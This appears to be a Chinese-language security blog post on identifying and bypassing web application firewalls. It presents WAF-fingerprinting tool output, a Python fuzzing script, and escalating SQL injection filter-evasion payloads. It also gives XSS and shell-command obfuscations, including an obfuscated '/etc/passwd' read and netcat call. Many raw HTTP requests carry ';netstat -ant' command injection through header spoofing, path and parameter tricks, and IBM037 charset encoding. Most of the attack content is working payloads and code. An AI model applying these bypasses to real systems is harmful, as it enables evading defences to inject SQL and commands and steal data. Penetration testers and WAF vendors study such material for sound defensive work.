Web应用程序防火墙是位于Web应用程序与客户端端点之间的安全策略实施点。该功能可以用软件或硬件,在设备设备中运行或在运行通用操作系统的典型服务器中实现。它可以是独立设备,也可以集成到其他网络组件中。 对于WAF,你了解多少?需要这篇文章能对你有所帮助!
原文链接:点我
可以选择加入风起安全一起交流技术!
根据一些waf检测特性,我们可以一些小技巧,对WAF进行识别
$ wafw00f -l______/ \( Woof! )\______/ ),, ) (_.-. - _______ ( |__|()``; |==|_______) .)|__|/ (' /|\ ( |__|( / ) / | \ . |__|\(_)_)) / | \ |__|WAFW00F - Web Application Firewall Detection ToolCan test for these WAFs:aeSecure (aeSecure)
Airlock (Phion/Ergon)
ASP.NET Generic Protection (Microsoft)
Astra Web Protection (Czar Securities)
AWS Elastic Load Balancer (Amazon)
Yunjiasu (Baidu Cloud Computing)
Barikode (Ethic Ninja)
Barracuda Application Firewall (Barracuda Networks)
Bekchy (Faydata Technologies Inc.)
BinarySec (BinarySec)
BitNinja (BitNinja)
BlockDoS (BlockDoS)
Bluedon (Bluedon IST)
CacheWall (Varnish)
CdnNS Application Gateway (CdnNs/WdidcNet)
WP Cerber Security (Cerber Tech)
ChinaCache CDN Load Balancer (ChinaCache)
Chuang Yu Shield (Yunaq)
ACE XML Gateway (Cisco)
Cloudbric (Penta Security)
Greywizard (Grey Wizard)
HyperGuard (Art of Defense)
.....
$ python identYwaf.py __ __ ____ ___ ___ ____ ______ | T T __ __ ____ _____
l j| \ / _]| \ | T| | || T__T T / T| __|| T | \ / [_ | _ Yl_j l_j| ~ || | | |Y o || l_| | | D YY _]| | | | | |___ || | | || || _|j l | || [_ | | | | | | ! \ / | | || ]
|____jl_____jl_____jl__j__j l__j l____/ \_/\_/ l__j__jl__j (1.0.XX)Usage: python identYwaf.py [options]
在对waf测试过程中,下面这段请求被WAF拦截
GET /get/index.jsp?id=payload HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID=B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
####2.选择Fuzzing字典
####3.脚本编写
def fuzzing(payload):payloads &#61; []special_chars &#61; [&#39;\r&#39;, &#39;\n&#39;, &#39;\t&#39;, &#39;_&#39;, &#39;~&#39;, &#39;&&#39;, &#39;-&#39;, &#39;&#61;&#39;, &#39;/&#39;, &#39;*&#39;,&#39;^&#39;, &#39;$&#39;, &#39;,&#39;, &#39;.&#39;, &#39;/&#39;, &#39;<&#39;, &#39;>&#39;, &#39;|&#39;, &#39;/**/&#39;, &#39;--&#39;,&#39;\r\n&#39;, &#39;||&#39;]#special_chars 字典在步骤2中选择合适的for char in special_chars:for k in range(len(payload)):try:temp_payload &#61; payload[:k] &#43; char &#43; payload[k:]payloads.append(temp_payload)except Exception as e:print(e)return payloads
过滤关键词:and
, or
, union
可能正则: preg_match(&#39;/(and|or|union)/i&#39;, $id)
- Blocked: union select user, password from users
- Bypass: 1 || (select user from users where user_id &#61; 1) &#61; &#39;admin&#39;
####• Step 2:
过滤关键词: and
, or
, union
, where
- Blocked: 1 || (select user from users where user_id &#61; 1) &#61; &#39;admin&#39;
- Bypass: 1 || (select user from users limit 1) &#61; &#39;admin&#39;
####• Step 3:
过滤关键词: and
, or
, union
, where
, limit
- Blocked: 1 || (select user from users limit 1) &#61; &#39;admin&#39;
- Bypass: 1 || (select user from users group by user_id having user_id &#61; 1) &#61; &#39;admin&#39;
过滤关键词: and
, or
, union
, where
,limit
, group by
, select
- Blocked: 1 || (select user from users group by user_id having user_id &#61; 1) &#61; &#39;admin&#39;
- Bypass: 1 || (select substr(group_concat(user_id),1,1) user from users ) &#61; 1
过滤关键词: and
, or
, union
, where
,limit
, group by
, select
- Blocked: 1 || (select substr(gruop_concat(user_id),1,1) user from users) &#61; 1
- Bypass: 1 || 1 &#61; 1 into outfile &#39;result.txt&#39;
- Bypass: 1 || substr(user,1,1) &#61; &#39;a&#39;
过滤关键词: and
, or
, union
, where
,limit
, group by
, select
, &#39;
- Blocked: 1 || (select substr(gruop_concat(user_id),1,1) user from users) &#61; 1
- Bypass: 1 || user_id is not null
- Bypass: 1 || substr(user,1,1) &#61; 0x61
- Bypass: 1 || substr(user,1,1) &#61; unhex(61)
过滤关键词: and
, or
, union
, where
,limit
, group by
, select
,&#39;
,hex
- Blocked: 1 || substr(user,1,1) &#61; unhex(61)
- Bypass: 1 || substr(user,1,1) &#61; lower(conv(11,10,36))
过滤关键词: and
, or
, union
, where
,limit
, group by
, select
,&#39;
,hex
, substr
- Blocked: 1 || substr(user,1,1) &#61; lower(conv(11,10,36))
- Bypass: 1 || lpad(user,7,1)
过滤关键词: and
, or
, union
, where
,limit
, group by
, select
,&#39;
,hex
, substr
,white space
- Blocked: 1 || lpad(user,7,1)
- Bypass: 1%0b||%0blpad(user,7,1)
###技巧三&#xff1a;混淆
Standard:
Bypassed:
Standard: SELECT * FROM all_tables WHERE OWNER &#61; &#39;DATABASE_NAME&#39;
Bypassed: sELecT * FrOm all_tables whERe OWNER &#61; &#39;DATABASE_NAME&#39;
Blocked:
Standard:
Standard: ">
Encoded: "> (一般形式)
Encoded: "> (html编码)
Obfuscated:
tt p://6 6.000146.0x7.147/">XSS
Blocked:
Bypassed:
Blocked: /?id&#61;1&#43;union&#43;select&#43;1,2,3--
Bypassed: /?id&#61;1&#43;un/**/ion&#43;sel/**/ect&#43;1,2,3--
Standard: http://victim/cgi/../../winnt/system32/cmd.exe?/c&#43;dir&#43;c:\
Obfuscated: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c&#43;dir&#43;c:\
Standard:
Obfuscated: %253Cscript%253Ealert()%253C%252Fscript%253E
Standard: /bin/cat /etc/passwd
Obfuscated: /???/??t /???/??ss??
Used chars: / ? t s
Standard: /bin/nc 127.0.0.1 1337
Obfuscated: /???/n? 2130706433 1337
Used chars: / ? n [0-9]
Standard:
Obfuscated:
Standard: /bin/cat /etc/passwd
Obfuscated: /bi&#39;n&#39;&#39;&#39;/c&#39;&#39;at&#39; /e&#39;tc&#39;/pa&#39;&#39;ss&#39;wd
Standard:
Obfuscated:
- Case: Unknown Token for the Tokenizer- Payload: ?id&#61;‘-sqlite_version() UNION SELECT password FROM users --
- Case: Unknown Context for the Parser (Notice the uncontexted bracket)- Payload 1: ?id&#61;123);DROP TABLE users --- Payload 2: ?id&#61;1337) INTO OUTFILE ‘xxx’ --
https://github.com/codewatchorg/bypasswaf
用户可以修改在每个请求中发送的X-Originating-IP&#xff0c;X-Forwarded-For&#xff0c;X-Remote-IP&#xff0c;X-Remote-Addr头。 这可能是顶部绕过技术的工具。 将WAF配置为信任自己&#xff08;127.0.0.1&#xff09;或上游代理设备是常见的&#xff0c;这是此绕过目标。
原始请求 | 插件改变后 |
---|---|
X-Originating-IP&#xff1a;原始IP | X-Originating-IP&#xff1a;127.0.0.1 |
X-Forwarded-For&#xff1a;原始IP | X-Forwarded-For&#xff1a;127.0.0.1 |
X-Remote-IP&#xff1a;原始IP | X-Remote-IP&#xff1a;127.0.0.1 |
X-Remote-Addr&#xff1a;原始IP | X-Remote-Addr&#xff1a;127.0.0.1 |
案例X-Originating-IP > 127.0.0.1&#xff1a;
GET /get/?id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For:127.0.0.2
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
“Content-Type”头部在每个请求中可以保持不变&#xff0c;从所有请求中删除&#xff0c;或者修改为每个请求的许多其他选项之一。 一些WAF将仅仅基于已知内容类型来解码/评估请求&#xff0c;这个特征针对该弱点。
原始请求 | 结果 |
---|---|
Content-Type&#xff1a;原始 | Content-Type&#xff1a;原始 |
Content-Type&#xff1a;原始 | 删除Content-Type |
Content-Type&#xff1a;原始 | Content-Type: invalid |
Content-Type&#xff1a;原始 | Content-Type: example |
Content-Type&#xff1a;原始 | Content-Type: multipart/ |
Content-Type&#xff1a;原始 | Content-Type: multipart/digest |
Content-Type&#xff1a;原始 | Content-Type: multipart/digest; boundary&#61;0000 |
Content-Type&#xff1a;原始 | Content-Type: multipart/; boundary&#61;0000 |
案例&#xff1a;
POST /post_key/main.jsp HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Content-Typeapplication/x-www-form-urlencoded
Referer: http://10.100.12.249:8080/post_key/
Content-Length: 30
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
Content-Type: multipart/; boundary&#61;0000name&#61;%3Bnetstat&#43;-ant&#43;&pass&#61;1
也可以修改“主机”标题。 配置不当的WAF可能配置为仅根据此标头中找到的主机的正确FQDN来评估请求&#xff0c;这是此绕过目标。
案例&#xff1a;
POST /post_key/main.jsp HTTP/1.1
Host: 改变这里
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Content-Typeapplication/x-www-form-urlencoded
Referer: http://10.100.12.249:8080/post_key/
Content-Length: 30
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
Content-Type: multipart/; boundary&#61;0000name&#61;%3Bnetstat&#43;-ant&#43;&pass&#61;1
路径注入功能可以不修改请求&#xff0c;注入随机路径信息&#xff08;/path/to/example.php/randomvalue?restofquery&#xff09;&#xff0c;或注入随机路径参数&#xff08;/path/to/example.php;randomparam&#61;randomvalue&#xff1f; resetofquery&#xff09;。 这可以用于绕过依赖于路径信息的编写不良的规则。
原始请求
GET /get/?id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
Pathinfoinjection
GET /get//fhwa84a04vq8a0jnefo?id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
PathParametwesinjection
GET /get/;mhz&#61;cpv?id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
路径混淆功能将路径中的最后一个正斜杠修改为随机值&#xff0c;或者默认情况下不做任何操作。 最后一个斜杠可以修改为许多值中的一个&#xff0c;在许多情况下导致仍然有效的请求&#xff0c;但是可以绕过依赖于路径信息的写得不好的WAF规则。
原始请求
GET /get/?id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
PathObfuscation_//
GET /get///?id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
PathObfuscation_/./
GET /get/././?id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
PathObfuscation_/random/./
GET /get/co7t/../co7t/../?id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
PathObfuscation_\
GET \get\?id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
PathObfuscation_/.//
GET /get/.//.//?id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
PathObfuscation_/./\
GET /get/././\\?id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
PathObfuscation_/.\
GET /get/.\.\?id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
ParamObfuscation
原始请求
GET /get/?id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
ParamObfuscation_&#43;
GET /get/?&#43;id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
ParamObfuscation_%
GET /get/?%id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
ParamObfuscation_%20
GET /get/?%20id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
ParamObfuscation_%00
GET /get/?%00id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
对已有参数进行赋值&#xff0c;参数污染
原始攻击
GET /get/?id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
HPP.First_test(赋值test)
GET /get/?id&#61;;netstat%20-ant&id&#61;test&id&#61;test&id&#61;test HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
HPP.Last_test
GET /get/?id&#61;test&id&#61;test&id&#61;test&id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
对空格进行编码
GET /get/?id&#61;;netstat%20-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
URL编码
%u编码
GET /get/?id&#61;;netstat%u0000-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
Content-Length: 6
Double URL
GET /get/?id&#61;;netstat%2500-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
Content-Length: 6
Double Double
GET /get/?id&#61;;netstat%25%30%30-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
Content-Length: 6
HEX
GET /get/?id&#61;;netstatx00-ant HTTP/1.1
Host: 10.100.12.249:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml&#43;xml,application/xml;q&#61;0.9,*/*;q&#61;0.8
Accept-Language: zh-CN,zh;q&#61;0.8,zh-TW;q&#61;0.7,zh-HK;q&#61;0.5,en-US;q&#61;0.3,en;q&#61;0.2
Accept-Encoding: gzip, deflate
Connection: close
COOKIE: JSESSIONID&#61;B4640D0258CA8C041F8102EE58A1E76B
Upgrade-Insecure-Requests: 1
Content-Length: 6
在进行测试时候发现下面这段请求被拦截,很明显带有注入特征
POST /sample.aspx?input0&#61;something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset&#61;utf-8
Content-Length: 41input1&#61;&#39;union all select * from users--
我们使用下面的编码技术进行编码绕过
import urllibdef paramEncode(params&#61;"", charset&#61;"IBM037", encodeEqualSign&#61;False, encodeAmpersand&#61;False, urldecodeInput&#61;True, urlencodeOutput&#61;True):result &#61; ""equalSign &#61; "&#61;"ampersand &#61; "&"if encodeEqualSign:equalSign &#61; equalSign.encode(charset)if encodeAmpersand:ampersand &#61; ampersand.encode(charset)params_list &#61; params.split("&")for param_pair in params_list:param, value &#61; param_pair.split("&#61;")if urldecodeInput:param &#61; urllib.unquote(param).decode(&#39;utf8&#39;)value &#61; urllib.unquote(value).decode(&#39;utf8&#39;)param &#61; param.encode(charset)value &#61; value.encode(charset)if urlencodeOutput:param &#61; urllib.quote_plus(param)value &#61; urllib.quote_plus(value)if result:result &#43;&#61; ampersandresult &#43;&#61; param &#43; equalSign &#43; valuereturn result# for IIS
print paramEncode("input1&#61;&#39;union all select * from users--")# prints %89%95%97%A4%A3%F1&#61;%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60
编码后变成下面这段请求&#xff0c;可以成功进行bypass
POST /sample.aspx?%89%95%97%A4%A3%F0&#61;%A2%96%94%85%A3%88%89%95%87 HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset&#61;ibm037
Content-Length: 115%89%95%97%A4%A3%F1&#61;%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60
目标 | Post(application/x-www-form-urlencoded) |
---|---|
Nginx&#xff0c;uWSGI-Django-Python3 | IBM037&#xff0c;IBM500&#xff0c;cp875&#xff0c;IBM1026&#xff0c;IBM273 |
Nginx&#xff0c;uWSGI-Django-Python2 | IBM037&#xff0c;IBM500&#xff0c;cp875&#xff0c;IBM1026&#xff0c;utf-16&#xff0c;utf-32&#xff0c;utf-32BE&#xff0c;IBM424 |
